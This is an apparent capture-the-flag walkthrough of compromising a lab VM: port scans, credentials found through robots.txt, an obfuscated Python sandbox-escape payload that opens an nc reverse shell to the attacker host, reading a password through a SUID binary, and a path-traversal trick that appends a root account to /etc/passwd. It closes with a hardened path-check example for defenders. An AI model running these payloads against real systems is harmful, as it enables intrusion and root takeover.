Information gathering
TCP open-port scan
# Nmap 7.93 scan initiated Sat Sep 2 06:03:51 2023 as: nmap --min-rate 10000 -p- -oA tcp_open_port 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00011s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
MAC Address: 00:0C:29:81:3C:60 (VMware)
# Nmap done at Sat Sep 2 06:04:07 2023 -- 1 IP address (1 host up) scanned in 15.16 seconds
UDP open-port scan
# Nmap 7.93 scan initiated Sat Sep 2 06:04:07 2023 as: nmap -sU --min-rate 10000 -p- -oA udp_open_port 192.168.43.148
Warning: 192.168.43.148 giving up on port because retransmission cap hit (10).
Nmap scan report for 192.168.43.148
Host is up (0.00077s latency).
All 65535 scanned ports on 192.168.43.148 are in ignored states.
Not shown: 65457 open|filtered udp ports (no-response), 78 closed udp ports (port-unreach)
MAC Address: 00:0C:29:81:3C:60 (VMware)
# Nmap done at Sat Sep 2 06:05:33 2023 -- 1 IP address (1 host up) scanned in 86.07 seconds
Service and version scan of the open ports
# Nmap 7.93 scan initiated Sat Sep 2 06:05:33 2023 as: nmap -sT -sV -O -p22,80, -oA open_port_service 192.168.43.148
Nmap scan report for 192.168.43.148
Host is up (0.00061s latency).
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.5 (protocol 2.0)
80/tcp open http Apache httpd 2.4.46 ((Unix) mod_wsgi/4.7.1 Python/3.9)
MAC Address: 00:0C:29:81:3C:60 (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.6
Network Distance: 1 hop
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Sep 2 06:05:54 2023 -- 1 IP address (1 host up) scanned in 21.07 seconds
Getting a shell
Information gathering shows that the target has ports 22 and 80 open; port 80 is tested first.
Sensitive information in robots.txt
Opening the target's HTTP site in a browser, robots.txt lists three paths:
User-agent: *
Disallow: /register
Disallow: /login
Disallow: /zbir7mn240soxhicso2z
Checking each in turn, the page at http://192.168.43.148/zbir7mn240soxhicso2z reveals a credential, which is saved:
Username: steve
Password: bvbkukHAeVxtjjVH
Visit /login and log in with the credential just obtained; after a successful login the following screen is shown.
Clicking "Welcome back, steve!" leads to a Python code-execution page.
From the hints on the page, the filter function that checks submitted code is obtained:
def check_if_safe(code: str) -> bool:
    if 'import' in code:  # import is too dangerous
        return False
    elif 'os' in code:  # os is too dangerous
        return False
    elif 'open' in code:  # opening files is also too dangerous
        return False
    else:
        return True
As can be seen, it checks whether the code contains the strings import, os or open; if any is present the code is not executed, so a bypass is needed.
Following "python沙箱逃逸总结" (Python sandbox escape summary) from 拓海AE's CSDN blog, a reverse-shell payload is constructed:
print(getattr(getattr(__builtins__, '__tropmi__'[::-1])('so'[::-1]), 'metsys'[::-1])('nc -e /bin/bash 192.168.43.128 443'))
On Kali, run rlwrap nc -lvnp 443 to listen, then execute the payload.
Reverse shell obtained successfully!
Privilege escalation
In the home directory of user py there is a SUID file typing together with its source typing.cc:
#include <iostream>
#include <string>
#include <iterator>
#include <fstream>
#include <algorithm>

int main(){
    std::cout<<"Let's play a game! If you can type the sentence below, then I'll tell you my password.\n\n";
    std::string text="the quick brown fox jumps over the lazy dog";
    std::cout<<text<<'\n';
    std::string line;
    std::getline(std::cin,line);
    if(line==text){
        // Correct sentence: stream /home/py/password.txt straight to stdout
        std::ifstream password_file("/home/py/password.txt");
        std::istreambuf_iterator<char> buf_it(password_file),buf_end;
        std::ostreambuf_iterator<char> out_it (std::cout);
        std::copy(buf_it,buf_end,out_it);
    }
    else{
        std::cout<<"WRONG!!!\n";
    }
}
Reading it shows that entering the quick brown fox jumps over the lazy dog makes it print the contents of /home/py/password.txt. So run the binary, enter the quick brown fox jumps over the lazy dog, and obtain the password:
54ezhCGaJV
Switched to user py successfully.
Continuing with sensitive-information enumeration, /home/py/secret_stuff/ contains a root-owned SUID file backup and its source backup.cc. Reading the source:
#include <iostream>
#include <string>
#include <fstream>

int main(){
    std::cout<<"Enter a line of text to back up: ";
    std::string line;
    std::getline(std::cin,line);
    std::string path;
    std::cout<<"Enter a file to append the text to (must be inside the /srv/backups directory): ";
    std::getline(std::cin,path);
    // Only a string-prefix check; ".." components are not resolved
    if(!path.starts_with("/srv/backups/")){
        std::cout<<"The file must be inside the /srv/backups directory!\n";
    }
    else{
        std::ofstream backup_file(path,std::ios_base::app);
        backup_file<<line<<'\n';
    }
    return 0;
}
Its function is to append text to a file, and the restriction only checks whether the path begins with /srv/backups, so ../ can be used to bypass it and append a root user xiaoliyu to /etc/passwd (modifying passwd, shadow, sudoers or similar configuration files would all work).
On Kali, generate the password hash with openssl:
openssl passwd -1 -salt xiaoliyu 1234567
$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/
On the target, run cat /etc/passwd|grep root to get the root line, replace the x with the hash generated on Kali, and the line to append becomes:
xiaoliyu:$1$xiaoliyu$TPkEIAAV6c3.9lCGGytdB/:0:0::/root:/bin/bash
Run the backup binary and enter the payload line and the file name.
Then switch to user xiaoliyu with password 1234567. Success!
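A defender's view of the backup.cc flaw, as an added example that is not the VM author's code: the page's string-prefix check next to a hardened check that canonicalises the path (symlinks and ".." resolved) before comparing it component by component against the allowed directory. The function names and sample paths are mine.

```cpp
#include <filesystem>
#include <iostream>
#include <string>
#include <system_error>

namespace fs = std::filesystem;

// The check as written in backup.cc on this page: a plain string-prefix
// test, which "/srv/backups/../../etc/passwd" passes.
bool weak_path_check(const std::string& path) {
    const std::string prefix = "/srv/backups/";
    return path.compare(0, prefix.size(), prefix) == 0;
}

// Hardened check (added example, names are mine): resolve symlinks and
// "." / ".." first, then require the allowed directory to be a
// component-wise prefix of the result, so "/srv/backups_evil/x" and
// "/srv/backups" itself are rejected as well as traversal.
bool is_inside_backup_dir(const std::string& path,
                          const fs::path& base = "/srv/backups") {
    std::error_code ec;
    // weakly_canonical resolves the existing leading part like realpath
    // and lexically normalises the rest, so a backup file that does not
    // exist yet is still handled.
    const fs::path canon = fs::weakly_canonical(fs::path(path), ec);
    if (ec) return false;
    const fs::path canon_base = fs::weakly_canonical(base, ec);
    if (ec) return false;

    auto b = canon_base.begin();
    auto p = canon.begin();
    for (; b != canon_base.end(); ++b, ++p) {
        if (p == canon.end() || *p != *b) return false;
    }
    // Something must remain below the directory: the directory itself
    // is not a valid backup file.
    return p != canon.end();
}

int main() {
    // Constructed sample inputs, not taken from the walkthrough.
    const char* samples[] = {"/srv/backups/notes.txt",
                             "/srv/backups/../../etc/passwd",
                             "/srv/backups_evil/notes.txt"};
    for (const char* s : samples) {
        std::cout << s << "  weak=" << weak_path_check(s)
                  << "  hardened=" << is_inside_backup_dir(s) << '\n';
    }
    return 0;
}
```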